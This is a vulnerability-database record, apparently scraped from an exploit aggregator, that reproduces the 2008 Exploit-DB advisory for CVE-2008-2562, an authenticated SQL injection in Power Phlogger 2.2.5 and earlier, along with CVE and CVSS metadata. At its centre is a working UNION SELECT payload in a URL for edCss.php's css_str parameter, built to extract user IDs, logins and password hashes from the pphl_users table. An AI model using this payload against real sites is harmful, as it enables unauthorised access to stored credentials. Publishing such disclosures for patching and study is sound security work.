Power Phlogger 2.2.5 css_str SQL Injection Vulnerability

{"bulletinFamily": "exploit", "id": "EDB-ID:5744", "cvelist": ["CVE-2008-2562"], "modified": "2008-06-05T00:00:00", "lastseen": "2016-01-31T23:30:48", "edition": 1, "sourceData": "############################################################\n\nSQL Injection vulnerability in Power Phlogger\n\nBy MustLive (http://websecurity.com.ua)\n\nDetailed information: http://websecurity.com.ua/2158/\n\nDescription: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.\n \nSQL Injection:\n \nhttp://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit\n \nWith this query you will receive id, login and password (hash) of first user.\n \nVulnerable versions are Power Phlogger <= 2.2.5.\n \n############################################################\n\n# milw0rm.com [2008-06-05]\n", "published": "2008-06-05T00:00:00", "href": "https://www.exploit-db.com/exploits/5744/", "osvdbidlist": ["45976"], "reporter": "MustLive", "hash": "1dbf25c62b38051e8297868f7339e38e25c407cfe115ce4a3db76112a8d1c2fa", "title": "Power Phlogger 2.2.5 css_str SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability. CVE-2008-2562. Webapps exploit for php platform", "references": [], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5744/", "viewCount": 1, "enchantments": {"vulnersScore": 6.0}}

{"result": {"cve": [{"id": "CVE-2008-2562", "type": "cve", "title": "CVE-2008-2562", "description": "SQL injection vulnerability in edCss.php in PowerPhlogger 2.2.5 and earlier allows remote authenticated users to execute arbitrary SQL commands via the css_str parameter in an edit action.", "published": "2008-06-06T14:32:00", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2562", "cvelist": ["CVE-2008-2562"], "lastseen": "2016-09-03T10:36:36"}]}}